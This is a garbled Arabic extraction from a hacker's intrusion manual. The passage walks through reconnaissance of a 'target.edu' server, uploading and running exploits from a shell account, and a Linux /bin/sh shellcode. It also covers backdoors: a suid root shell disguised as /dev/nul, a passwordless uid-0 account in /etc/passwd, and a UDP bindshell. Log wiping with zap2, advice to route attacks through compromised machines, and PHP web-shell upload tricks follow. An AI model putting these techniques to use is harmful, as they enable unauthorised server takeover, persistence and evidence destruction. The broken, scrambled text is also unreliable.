وهذا یعني انهیمكنللمستخدم الاحتفاظ بكلمة السرلمدةثلاثةاسابیعبدونتغییر وانهیجب ان یغیرهاكل<br />
ستة<br />
استعرا ض مل ف المجموعةكالتالي .:<br />
اسابیع ..<br />
ls /etc/group $<br />
root::0:root<br />
adm::2:adm,root<br />
bluebox::70:<br />
ویمكن انیحتوي ملف المجموعة علىكلمات سرأو لایحتوي !!<br />
اذاكان لایحتوي علىكلمة سرفانهیمكن انتصبح انت مدیراللنظامفي<br />
عادي ولیسكمدیرللنظام وذلك بعدة طرق<br />
حالةدخولك بكلمة<br />
سرلمستخدم<br />
.…<br />
<strong>١</strong>٨٠
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
شرح مفصل من الألف إلى الیاء في احتراف<br />
طریق لینكس<br />
"<br />
اختراق المواقع عن<br />
"<br />
$$$$$$$$$$$$<br />
الكاتب:أی س ر<br />
$$$$$$$$$$$$<br />
UNix Usage IN HackinG<br />
اهلا بكم جمیعا<br />
في البدایهاحبانانوهانهناكالعدید منالدروسالجمیله فعلا .. ولكنهاقدیمه ولیست<br />
لذلكاكتبلكم هذاالدرس المطوللكي یكون مكاناللمبتدئین یمكنان یستفیدوا منه<br />
و اتمنى فعلاان یحوز علىاعجابكم<br />
بع ضالمصطلحات الهامه :<br />
كثیر من الناس یحبونان یطلقوا علىكل منال<br />
up to date<br />
pc , servers , super<strong>com</strong>puters و غیرها<br />
(:<br />
-<br />
كلمه BOX<br />
النظام الذي سو ف نقومباختراقه یحتوي عاده علىالعدید منالیوزرز ..بالاضافهللیوزرز<br />
تسطیعانتطلق علىالرئیسهناككلمه<br />
و هوالادمیناو المدیر على النظام....<br />
بالنسبه لانظمهالتشغیل<br />
طبعا ..لا یمكنكانتخترقباستخدام نظامالتشغیل windows ..بلتحتاجالىاي نظام مشتق من نظام<br />
التشغیلالیونیكس ..<br />
حسنا ..السؤالهولماذا هذهالانظمهبالذات ...ولماذا لا یصلحالویندوز؟؟<br />
لسبیبن<br />
الانترنتا غلبه اجهزه شغاله علىالیونیكس سیستمز ...و نادرلماتلاقي جهاز شغال علىالویندوز<br />
nt<br />
، و هو یكونsuperuser ... root<br />
..<br />
:<br />
:<br />
-<strong>١</strong><br />
. 9x<br />
اذناقل حاجه حتىتخترق جهازاو سیرفیر شغال علىالیونیكس ..یجبانتكون ملمابنظامالتشغیل هذا..<br />
لذا منالافضلانكتركبهفي جهازك<br />
معظمادوات واكوادالاكسبلویتات مصممهللعملفيبیئه الیونیكس<br />
..<br />
-٢ طبعا ..<br />
...<br />
اوكي ماهيتوزیعاتالیونیكس ؟؟واللینكس ؟؟<br />
بالنسبهللیونیكس ..فهو منقسماليقسمین<br />
<strong>١</strong>- یونیك ستجاري غیر مجاني<br />
٢- یونیكس مفتوحالمصدر و مجاني open source<br />
.. لذافیمكنكتجاهلهالان (:<br />
:<br />
(<br />
).<br />
بالنسبهللیونیكسالتجاري لا یمكنانتركبه على جهازكالعادي<br />
اما المجانيفیوجد منه عده عائلات<br />
BSD-<br />
و هيالاقدم والاصعبفيالاستعمال .. و منالافضللكالاتستعملهاالااذاكنتترغ بفيتركیب سیرفیر<br />
على الجهاز<br />
...<br />
یوجداللینكس ..وهو طبعا غني عنالتعری ف<br />
<strong>١</strong>٨<strong>١</strong>
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
(<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
..<br />
طبعا .. یوجد منهالعدید من التوزیعات وانكانافضلها هي SuSe (لماجربها ولكناسمعالكثیر من<br />
الناس یشكرونفي هذه التوزیعه<br />
امابالنسبه لاسهلتوزیهفهي MDK وقدوضعت هنا بع ضالدروس الخاصهبالمندریك<br />
یمكنكتحمیلها وقرائتها<br />
انلمتجد مكانات حصل منه علىاللینكس یمكنك مراسلتي علىایمیلي و نحدد مكانا<br />
لتسلیمك نسخه منالماندریك ٩اوالرید هات٧٫٢ (ثمنالاسطواناتالبلانك و النسخفقط<br />
علىاي حال ..للینكس ممیزاتكثیره امن مجاني ..یمكنكتطویرهلیلائمامكانیات جهازك<br />
(<br />
... مستقر ..<br />
..<br />
..<br />
..<br />
-الانترنت<br />
ماذا ...تریدانتخترق ..جمیل جمیل ..تریدانتخترق جهازكام ماذا ؟؟<br />
اه..تریدانتختر قاجهزه مبحرهفيالانترنت اذن ..دعنا نبحر علىالانترنت<br />
(:<br />
...<br />
انا عار فانك حصلت على الدرس ده منالانترنت ..لكن هذاكان عن طریقالویندوز<br />
..لكنانتالیومانسان مختل ف...ان تانسانلینكسي ذهفلسفه محترمه<br />
اذن یجبانتبحرالىالانترنت من نظامالیونیكس ..لناساسا یجبانتعر فالمودم بتاعك علىاللینكس<br />
حسبالتوزیعهاللي عندك حاولتعر فالمودم .. حتلاقياناللینكسلم یجداي مودم موصلبالجهاز ؟؟<br />
ما هذا .. لا تتعجب<br />
فكلالمودماتالدا خلیه یطلقون علیها<br />
لماذا لانها مصممهاساساللعملتحت نظام التشغیل windows ..ارجوك لاتلوماللینكس<br />
بل یجبانتلوم صانعكروتالفاكسالداخلیه هذه<br />
اوكي امابالنسبهللمودم الخارجي externalفهو مودم حقیقي<br />
... یوجد العدید منالمودمز الخارجیه مثل<br />
یجبان تتاكدانالمودم یكون<br />
علىاي حال خلینافي موضوعنا...<br />
خلا ص ..ادخل علىالانترنت من خلالال isp وذلك من خلال نظاماللیونیكس<br />
..<br />
.. winmodems<br />
internal<br />
..<br />
(:<br />
real or true modems<br />
acorp , u.s. robotics<br />
USB ولیس serial<br />
(:<br />
..<br />
...<br />
:<br />
..<br />
..<br />
..<br />
..<br />
-<strong>١</strong><br />
اهم حاجهقبلالشرو عفيالاختراقهيانتحاولالایتمالایقا عبك وكشف محاولتك لاختراق سیریفیر<br />
معین<br />
و طبعا هنك و سائل عدیدهلذلكلن اتطرقالیها لانهناكالعدید من الشروحالمتمیزهفي مجالالحمایه<br />
وازالهالاثر<br />
الخصهمفي نقطتیناوثلاثه<br />
ایكانتحاولانتسجلفي موقعتحاولاختراقه .. و لا حتىباساميمزوره لان هذاقد یجعلك عرضه<br />
لكش فالايبي الخا صبك<br />
و منثمال ispثم رقم هاتفك و صباحالفل ت<br />
٢-ایاكان تتباهىباختراقاتكابدااما غیرالمهتمینبامورالهاك<br />
احاولالاتخترق دائم من خلال جهازك ...لا لا ..انتفهمتني غلط م شقصديیعنيتروحلنتكافیه<br />
..<br />
...<br />
.. لكن<br />
-٣<br />
(:<br />
جهازك =====>الجهازالض حیه ... ده م ش مامون<br />
جهازك======> جهاز وسیط======> السیرفیرالض حیه ...دهكدهكویساوي<br />
طیبایهالجهازالوسیط ده.. ده ممكن یكون مثلا جهاز مخترق منقبلاو شیل اكاونت<br />
.<br />
<strong>١</strong>٨٢
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
طیب ماهوالشیلاكاون ت:هو عباره عن خدمه حیث یمكنك من خلالهاالتحكمفي جهاز من بعید و هذا<br />
الجهاز علیه نظامالیونیكس<br />
طبعا من غیرانتقومباختراق هذا الجهاز ..و یوجد العدید ممن یقدمون هذا الحدمه مجانا<br />
٤- حاولان لاتختر قاجهزه خطیره و مهمه مثل .mil. govاو سیرفیرا تاجب علیكقبلان<br />
غیرها من هذاالنمط.<br />
٥- هذه النقطهتعتمد على بع ضتقنیاتالفریكینج<br />
edu. و<br />
..<br />
.. لعملاخفاءلرقمتلیفونك عنمزودالخدمهلدیك .<br />
REdirecting<br />
:<br />
-فح صالمواقع ومنافذ ال TCP<br />
یجب علیكقبلانتقومبالاخترا قانتعر فكیف یمشيالانترنت ..انهیعتمد علىبروتوكول یدعى<br />
TCP\IP<br />
....<br />
... ركزمعایاابوسایدك = D<br />
و بع ض البروتوكولاتالاخرى<br />
طیب<br />
المفرو ضانكل جهاز على الن تبیكونفیهبورتات مفتوحه ..هذاالبورتات یمكنكانتقوم من خلالها<br />
بارسالالداتا<br />
من جهاز الى ذلك الجهاز ..هذه البورتاتالمفتوحه (المفتوحهفقط )تكون علىاستعدد دائما لتلقي الداتا<br />
من ریموتبوكس<br />
دائما ماترتب طالبورتات المفتوحهبما یسمىبخدمه<br />
و هذا الخدمه service تكون مستضافه من خلال دیمون<br />
اذن ..الدیمون هذااذاقام صاحبالموقع بفتحهفيالسیرفیرفانه یقوم بفتح منفذفيالسیرفیر .. لكي یقوم<br />
الدیمون هذا من خلاله بتقدیمالخدمهالملعونه = D<br />
و هذه بع ض الخدمات معالبورتاتالخاصهبهم لكن طبعا هناككثییر<br />
hi_HaCkEr & MaXhAk2000<br />
..<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
...<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
...<br />
ماهيالمنافذ المفتوحهفيالسیرفیر المستهد ف اذنكیفت حصل عىالمعلومات هذه<br />
من خلال ماالscaners port ...السكانرز هي عباره عنبرامجتحولان تتصلبالسیرفیر المستهد ف<br />
من خلال جمیع المنا فذ ..و ذلكلمعرفهاي البورتاتالمفتوحه<br />
في هذا السیرفیر اشهر هذا السكانرز هيالاداه nmapبواسطه fyodor ول حسن الحظ یوجد نسخه<br />
منها خاصهبالویندوز و ..!!ایه ده ..؟؟<br />
احنام ش اتفقنا ننسىالویندوز ده خال ص=
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
.'[^' Escape character is<br />
.target.edu FTP server (SunOS 5.6) ready ٢٢٠<br />
quit<br />
.Goodbye ٢٢<strong>١</strong><br />
Connection closed by foreign host<br />
اهاااا<br />
دول دلونا علىمعلوما تقیمهاوياوي<br />
<strong>١</strong>- نظامالتشغیل هناك هو<br />
٢- دیمونالا فتيبي هناك هوالstandard الليبییجي مع نظمالسن sunOS<br />
(:<br />
SunOS 5.6<br />
تعال نجرببورتتانينتصلبیه منالتلنت :<br />
bash-2.03$ telnet target.edu 25<br />
...Trying xx.xx.xx.xx<br />
.Connected to target.edu<br />
.'[^' Escape character is<br />
target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 ٢٢٠<br />
09:18:14 -0<br />
(EDT) ٤٠٠<br />
quit<br />
target.edu closing connection ٢٫٠٫٠ ٢٢<strong>١</strong><br />
.Connection closed by foreign host<br />
ایضااستفدنامعلوما تقیمه هيان دیمون smtp هوال sendmail واناصداره هو ٨٫<strong>١</strong><strong>١</strong>٫٠/<br />
٨٫٩٫٣<br />
جمیل حمیل .. طیبلماذا نحتج الى هذاالمعلومات ؟؟ لانالاكسبلویت والثغرهالموجوده دائماتعتمد على<br />
ال daemonالموجود و على نظامالتشغیل لكنتوجد مشكله وهيان بع ض المكعلوماتقد یمكنان<br />
تكونمزورهاو غیر ص حیحه<br />
ازاي ؟؟؟تابعمعایاكده<br />
..<br />
:<br />
بالاداه nmap<br />
bash-2.03$ nmap -sS target.edu<br />
Starting nmap V. 2.53 by fyodor@insecure.org (<br />
( /www.insecure.org/nmap<br />
:(Interesting ports on target.edu (xx.xx.xx.xx<br />
The 1518 ports scanned but not shown below are in state: closed)<br />
(<br />
Port State Service<br />
tcp open ftp/٢<strong>١</strong><br />
tcp open telnet/٢٣<br />
<strong>١</strong>٨٥
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
tcp open smtp/٢٥<br />
tcp open http/٨٠<br />
tcp open pop3/<strong>١</strong><strong>١</strong>٠<br />
TCP Sequence Prediction: Class=random positive increments<br />
(!Difficulty=937544 (Good luck<br />
Remote operating system guess: Linux 2.1.122 - 2.2.14<br />
Nmap run <strong>com</strong>pleted -- 1 IP address (1 host up) scanned in 34<br />
seconds<br />
!!!!!!<br />
یانهاراسود<br />
نظامالتشغیل الليالادهقامت بتخمینه هولینكس<br />
م شكان sunOS !!!!!!اه یا و لادالكلب = @<br />
بساحنابرده لازمنعر فتوزیعهاللینكسالوجوده .. لكن نقدر نقولانالمعلومات اللي جمعناهاكفایه و<br />
ممكنتمشي<br />
طیب ..كدهاحناقمن بعمل سكان علىالموقع ولكن ممكناحدالادمینزلو عر فانانناقمنابفح ص موقعه<br />
...اعتقد نه حیكون زعلان منن و حنا م ش عایزینالادمینیزعل مننالذلك<br />
استخدمناالاختیار علىاي حلفان عمل سكانلموقع یعتبر عمل شرعيلا مشاكلفیه =D<br />
|:<br />
Ss-<br />
لمزید منالمعلومات راجع:<br />
bash-2.03$ man nmap<br />
رفعادواتك على شلاكونت<br />
(هذه الخطوهاذاكن عندك شیلاكاونت و م ش عایزتخترق من جهازك<br />
(<br />
اتبعالتالي :<br />
bash-2.03$ ls<br />
program.c<br />
sh-2.03$ ftp shell.<strong>com</strong><br />
Connected to shell.<strong>com</strong><br />
.shell.<strong>com</strong> FTP server (SunOS 5.6) ready ٢٢٠<br />
Name: luser<br />
.Password required for luser ٣٣<strong>١</strong><br />
:Password<br />
.User luser logged in ٢٣٠<br />
ftp> put program.c<br />
.PORT <strong>com</strong>mand successful ٢٠٠<br />
.(ASCII data connection for program.c (204.42.253.18,57982 <strong>١</strong>٥٠<br />
.Transfer <strong>com</strong>plete ٢٢٦<br />
ftp> quit<br />
Goodbye ٢٢<strong>١</strong><br />
..<br />
<strong>١</strong>٨٦
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
طبعا هذهالطریقه ن خلالاftp<br />
و هي غیر محببه لانهاتقوم بعمل ملفاتاللوجلذلك یفضللكانتقومبنسح سورسكودالاكسبلویت و<br />
لصقهافي مل ففيالشیل<br />
.<br />
sh-2.03$ vi exploit.c<br />
ثمانسخ الكودثمافتح تیرمینالتانيو اتصلبالشیل والصق الكودفي ملف و سمیهبامتداد.c<br />
كدهانت رفعتالاكسبلویت بتاعتكللشیلاكاونت<br />
.<br />
وكومبایلللاكسبلویتو بعدیناعملها رن على الهوستالمستهد ف<br />
sh-2.03$ gcc program.c -o program<br />
sh-2.03$ ./program<br />
-:<br />
.<br />
ملحوظه : عیباويانكتاخدالامرین دولكقاعده مسلمبیها..كلاكسبلود ولهاوامرهالخاصهفي<br />
الكومبایل وله طریقهفيالتشغیل<br />
تظهر هذا الطریقهفيالتعلیق البرمجياوفيالusage .<br />
-استغلالالثغراتالمختلفه<br />
هذااهمجزافي الموضو ع بمجردانتعر ف ماهو نظامالتشغیل عند الموقع المستهد ف وایضا الدیمونز<br />
الشغاله علىالسیرفیر<br />
فیمكنكانتذهبالىايدتابیزاللي بتقدم اكسبلویت ..و دي موجوده بكثره علىالانترنت<br />
http://www.linux.<strong>com</strong>.cn/hack.co.za<br />
مثلا دهفیهكل حاجه ممكن تتخیله .. مقسمهالى دیمونات و نظمتشغیل<br />
ولكن ..ماهيالاكسبلویت ؟؟<br />
الاكسبلویت عباره عن سورسكود عاده مكتوبفبلغه السياوالبیرلالمهمان<br />
الاكسبلویت ديتقومباستغلال منطقهمعینهفيالسیرفیر في حاله TARGET.EDU<br />
یمكنناان نستخدمالاكسبلویت الخاصه ب<br />
علىفكرهالعیال دیمااسمعهم یقولواان السند میل هواكبر دیمونمعر ضللاختراق ..م ش عار فایه<br />
السند میلاساسا ؟؟<br />
طیب روو حللدرس ده و نتتعر ف<br />
..<br />
sendmail 8.11.0 اواي دیموناخر<br />
:<br />
http://www.pharaonics.net/less/NEtworks/124.htm<br />
..<br />
.<br />
(<br />
....<br />
..<br />
..<br />
فیه حاجه لازمتعرفها انلماتشغلاكسبلویت على سیرفیرمعین ایهالفوائداللي جتعود علیك (غیر طبعا<br />
اختراق الموقع<br />
حت حصل على حاجتین اتنین اول حاجه شیل عادي<br />
تاني حاجه و دهالمهمبالنسبهلنا مایسمىبالرووت شیل<br />
طبعاانتلواخدت رووت شیل علىالسیرفیراذنفانتكدهتمتلككفهالصلاحیات و ممكنتعملكلاللي<br />
انت عایزه ..ممكنتستعملالرووت شیل دهكجهاز و سیط زي ماقلتفياول الدرس<br />
دتابیز صغیرهللاكسبلویتات هي<br />
www.securityfocus.<strong>com</strong> :<br />
www.insecure.org/sploits.html<br />
..<br />
.. طیب زي ماقل تانكلاكسبلویت مختلفه عنالاخر ى و یجب علیكانتقراالكود بتاعهااوالتعلیقا تاذا<br />
كنت لاتفهمفيلغهالبرمجه<br />
مناسهل واشهرالاكسبلویتاتهي البفراوفرفلو ... یقوم هذهالاكسبلویت بعمل ) دربكهفي الدیمون<br />
مم یؤديالىتشغیلالكودالذيتریده<br />
(<br />
<strong>١</strong>٨٧
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
یقوم هذا الكود بتشغیل شیلفيالسیرفیرلذلكفهو یسمى شیلكودcode shell<br />
طبعا یختل ف هذاالكودتبعالنظامالتشغیل ..لذلك یجب علینااننعر ف نظمالتشغیلالمستخدمفيالسیرفیر<br />
لو شوفناكود اكسبلویتمعینه ممكن نلاقي ده<br />
= []char shellcode<br />
\"<br />
"xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b<br />
\"<br />
"x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd<br />
"\x80\xe8\xdc\xff\xff\xff/bin/sh؛"<br />
اها..دههللینكس و یقوم بتشغیلالشیلالليفيالمسار دهه bin/sh/<br />
طبعالوالسیرفیر بتاعك شغال على نظامتشغیلاخراذن یجب علیكانتغیرالشیلكود<br />
دهالىاخر یناسبالنظامالمستهد ف .. طبعا ممكنتلاقي شیلكودسلجمیع نظمالتشغیلفي مواقع<br />
السیكیورتي المختلفه.<br />
...<br />
زي ماقلت یجب علیك الباانك متستعمل ش جهازكفيالاختراق .. وانماتستخدم جهازا وسیطااو شیل<br />
اكاونت ..طریقهلدخولالىالشیل اكاونتكالتالي<br />
bash-2.03$ telnet myshellaccount 23<br />
...Trying xx.xx.xx.xx<br />
.Connected to yourshellaccount<br />
.'[^' Escape character is<br />
Wel<strong>com</strong>e to yourshellaccount<br />
login: malicioususer<br />
(Password: (it doesn't display<br />
.
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
یا عیني ..كدهانا بقیت رووت =)<br />
طیبفیه العدید منالاكسبلویتت م ش بتخلیك رووت علىالسیستم..وانماتدیكبس شیلهنال<br />
لذلك یجب علیك نتقومبرفع اكسبلةیتاخرلوكل<br />
لل حصول على الرروتفيالنظام... تذكر نتحاولان تتجنب رفعالاكسبلویتاتبالا فتيبي علىقدر<br />
المستطا ع (احنا عایزینك =))<br />
فیه اكسبلویتاتاخر ىتعطیك صلاحیهاظهار مل فالباسورد..ايتي سي =><br />
local<br />
-وضعباك دور :-<br />
جمیل ..اذنفقداخذنا رووت علىالسیستم ..ماذا بعد ؟؟؟فعلاانتفيامكانكانتقوم بتغیرالموقعاو<br />
الصفحهالرئیسیه<br />
كل ما علیكانتب حث عنالاندكسفياي مكاناوباستخدامالامرفایند<br />
لكن هذابصراحه و من غیر زعل ..ده شغل اللامرز لان عیباويانكتفرد عضلاتك على موقع<br />
فاغلبالهاكرزبامكانهماختراق هذه الدومینات<br />
ولكنانص حك جدیا بتغییرالصفحهالرئیسیهفي موقع محترم مثل<br />
edu.<br />
..<br />
..<br />
microsoft.<strong>com</strong> , ibm.<strong>com</strong> etc<br />
..<br />
اوالمواقعالسیئهالمحتو ىكالاباحیهاو التيتسب الدین ... علىاي حل م ش موضوعنا دهه<br />
طیباحنا دلوقتي عایزین نحتفظبالموقع دهه تذكرالثلا ثاجهزهایاهم<br />
جهازك-----> جهاز وسیط------>الجهازالمستهد ف .<br />
اذن حنعملایه دلوقتي؟؟<br />
في حاجه انتلو كتبت exit حتطلعبرهالسیرفیر دهوتعودللشیل بتاعك و عشانترجعتاني یلزمك<br />
نفسالخطوات<br />
وفي هذه الفترهقد یحتملان یكونالادمینقدقام بتغییرالباسورداو ركببات شللدیمونالمصاباوقام<br />
بعملاب جریدله<br />
مما یؤديانتفشلالاكسبلویتفي عملها ..و الحل ؟؟<br />
بساحنا دلوقتي رووت و ممكننعمل الليفي نفسنا اذن نركبباك دوور یسمحلنابالعوده بعد ذلكفي<br />
اي وقت<br />
احسنباك دور هوه الهاك اتاك .. صعبان النورتون یكشفه و ممك... اه =| =|<br />
ایه الكلام ده یاد یاایسر ؟؟؟؟<br />
هاك اتاك =|<br />
اس ف نسیت<br />
طبعاالباك دورزفي موضوعي دهتختلفتماما عن الكلام الفاضي ده و لا مؤاخذه<br />
طبعاالباك دورز دي عایزالها موضو علواحدهان شاءاحطهلكمقریبا ..لكنانا ساذكرلكمالاساسیات<br />
فق ط<br />
<strong>١</strong>-ازايتعمل sushi؟؟؟؟<br />
یلزمكانتقومبنسخال<br />
لكيتقوم بعمل<br />
الى مكان خفي و نقومباعطاءه صلاحیاتال suidكالتالي<br />
bin/sh/<br />
:<br />
...<br />
!!!!!!<br />
(= ...<br />
suid shell او sushi<br />
sh-2.03$ cp /bin/sh /dev/nul<br />
هههههه<br />
..<br />
..<br />
فياغلبالاحیانالادمین لا ینظر داخلالدایركتوري .. dev ولو حصل و نظر دخلهفانهلن یشعربشيء<br />
غ ریب لانفیه مل فاساسااسمه<br />
D = لا دهاحنا عیال جدعاناوي =D<br />
null<br />
<strong>١</strong>٨٩
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
sh-2.03$ cd /dev<br />
sh-2.03$ chown root nul<br />
نعطي الشیلالصلاحیات اللياحنا عایزینها :-<br />
.<br />
sh-2.03$ chmod 4775 nul<br />
٤٧٧٥<br />
chmod +s nul<br />
..<br />
معناهاال suid اللياحنا عایزینها<br />
ممكن میشتغل شفي بع<br />
خليبالكانالامر<br />
فيكله<br />
ضالانظمه<br />
.. خلیك معالامرالاولبیعمل<br />
كده خلصنا مهمتنا<br />
sh-2.03$ exit<br />
.. تعالى نطلعبرهكده و نشو ف<br />
بعد ٨٠ یوملو رجعنا =D تعال نشو فكدهاللي حی حصل<br />
:<br />
sh-2.03$ whoami<br />
luser<br />
sh-2.03$ /dev/nul<br />
sh-2.03$ whoami<br />
root<br />
احنا سوبر یوزرزالان بكل سهوله =)<br />
فیه مشكله ..فيكثیر منالشیلزتمنعاعطاء صلاحیاتال suid یعني مینفعش ن حصل علىال<br />
وفي هذه الحاله یلزمناان نرفعللسیرفیرالمخترق شیل خا صتانياسمه sash وهواختصار ل<br />
sushi<br />
A<br />
stand-alone shell<br />
ذواوامر خاصهبه ...<br />
و هو یسمحباعطاء صلاحیاتالsuid<br />
ل bin/sh/ اذن نقدرنعملالانال<br />
sushi<br />
٢-كیف نضی ف یوزرزمزورین ؟؟<br />
طبعاانت رووت وتقدرتعملتغییرفيالمل ف<br />
اي حدانت عایزه<br />
باستعمال المحرر<br />
etc/passwd/ و ممكن من خلالالمل ف دهانكتضی ف<br />
vi<br />
-: vi<br />
sh-2.03$ vi /etc/passwd<br />
طبعا لازم یكون عندكفكره عنكیفیهاستخدامالمحرر<br />
في المل ف ده حتلاقي سطرلكل یوزر عادي یكون علىالشكل ده<br />
luser:passwd:uid:gid:startdir:shell<br />
في حاله السوبر یوزرزبیكونال<br />
اذناض ف السطر ده<br />
uid & gid =0<br />
:<br />
dood::0:0:dood:/:/bin/sh<br />
وكدهاانت ضفت سوبر یوزرللنظام<br />
sh-2.03$ su dood<br />
sh-2.03$ whoami<br />
dood<br />
<strong>١</strong>٩٠
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
وال uid<br />
طبعااحنا رووت<br />
..لیه لانالا خ dood كل منال gid<br />
یساوي صفر<br />
٣-كیفتضع<br />
..<br />
bindshell ؟<br />
bindshell<br />
..<br />
-:<br />
-<br />
عباره عن دیمون شبیه جدبال telnetd فيالحقیقهالتلنت دیمون عباره عنبایند شیل<br />
البایند شیل هذا یقوم بفتحبورتاو منفذیعني ولكنهلیس منفذ TCP بل منفذ UDP<br />
و طبعابیعطیك شیل عندالاتصالبهذاالبورت<br />
الطری ف والشیقفي الموضو عانهالادمینلما ییجيیعمل سكان علىالجهاز بتاعهللتامین عاده وفي<br />
اغلبالاحیانالسكن یكون<br />
على منافذال TCP و نادرا جداانیعمل سكان على منافذبروتوكول UDP<br />
..<br />
عملیهازالهالاثار<br />
في نظاامالیونیكس ..عندماتقومبالدخول الى حسابك ..فنكاترى رساله عنداول الدخولتعلمكباخر مره<br />
قمتبهابالدخول و رقمالايبيالذي د خلت منه<br />
یعني سیادتكلو دخلتباسم یوزرو بعدكدهالیوزر ده دخل حیلاقيالرساله دي<br />
.
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
: luser<br />
sh-2.03$ ./zap2 luser<br />
!Zap2<br />
sh-2.03$ who<br />
sh-2.03$<br />
لواسمك<br />
.....<br />
<strong>١</strong>٩٢
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
$$$$$$$$$$$$$$$<br />
الكاتب: Arab VieruZ<br />
$$$$$$$$$$$$$$$<br />
درس عن الShell PHP (الجزء الأول) "<br />
موضو عللبي ات شبي شل یشرح الطرق والخدا ع المستخدمة واوامرلینكس<br />
البي ات شبي شیل ملف یرعبكل صاحب موقع على سیرفر وحلهاسهل مما یمكن<br />
الموضوعبسیط جداًلكن سأطولهقلیلاًفسمحولي<br />
(:<br />
: الجزء الأول<br />
^^^^^^^^^<br />
اوامرلینكس<br />
*-----------------------------------------------*<br />
امر سرد الملفات a-ls<br />
:<br />
سرد جمیعالملفاتالمخفیةاو غیرها<br />
*-----------------------------------------------*<br />
امر عر ض محتویاتالملف<br />
e-catاو<br />
cat (هام جدا)<br />
:<br />
فتح المل ف وعر ض محتویاته<br />
*-----------------------------------------------*<br />
امر حذ فالملف : f-rm<br />
لحذ ف المل ف الذيترید<br />
*-----------------------------------------------*<br />
امر حذ فالمجلد : d-rm<br />
لحذ فالمجلد الذيترید<br />
*-----------------------------------------------*<br />
امرالنسخ : i-cp<br />
لنسخالمل فالذيترید<br />
*-----------------------------------------------*<br />
امراعادةالتسمیة : mv<br />
<strong>١</strong>٩٣
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
لأعادةالتسمیة<br />
*-----------------------------------------------*<br />
ملا حظة :لمعر ف المزید مناوامرلینكسقمبشراءالكتب ولل حصول علىمعلومات اكثرلأمر من الأوامر<br />
كمبوضعالأمرثم<br />
مثال<br />
help–<br />
help--ls :<br />
*-----------------------------------------------*<br />
: الجزء الثاني<br />
^^^^^^^^^<br />
كیفیةتنفیذ الأوامر :<br />
*-----------------------------------------------*<br />
<strong>١</strong>٩٤
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
<strong>١</strong>- ستجد مربعللكتابةقم بكتابةالأمرالمرادتنفیذه<br />
٢- هناتعر ض الملفات و المجلدات<br />
٣- هناتعر ض المجلداتفقط<br />
:<br />
٤- مكان الفلودر الذيتعمل علیهالآن<br />
٥- ضع العلامةلیخبرك ما یحد ث عند وجود خطأ<br />
*-----------------------------------------------*<br />
*-----------------------------------------------*<br />
الجزء الثالث<br />
^^^^^^^^^<br />
الخد ع والطرق لتحمیل هذا المل ف:<br />
*-----------------------------------------------*<br />
هناتأتي المشكله<br />
!!!<br />
لكنلیس ت مست حیله وسنستعر ض بع ض الطرقالتي اتبعهاانا شخصیاً<br />
<strong>١</strong>-ایجادثغرةتستطیع منهاتحمیلالملف مثال :ثغرةالنیوك القدیمة حقت ال txt.hacked<br />
*-----------------------------------------------*<br />
٢-لنفر ضاننا نریداختراق موقعمعین وكان صاحبالموقع ذكي جداً وحری ص<br />
هذي طریقهقدتنفعاولاًتحدیدالشركةالمستضیفة و نحاول الب حث عن مواقعفي نفسالسیرفراو على<br />
الأقلفي نفس شركةالأستضافة یكون صاحبها دلخ ونحاول نلقىثغرة نحمل منها المل ف<br />
*-----------------------------------------------*<br />
٣-المواقعالمجانیة التيتدعمالبي ات شبي....<br />
<strong>١</strong>٩٥
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
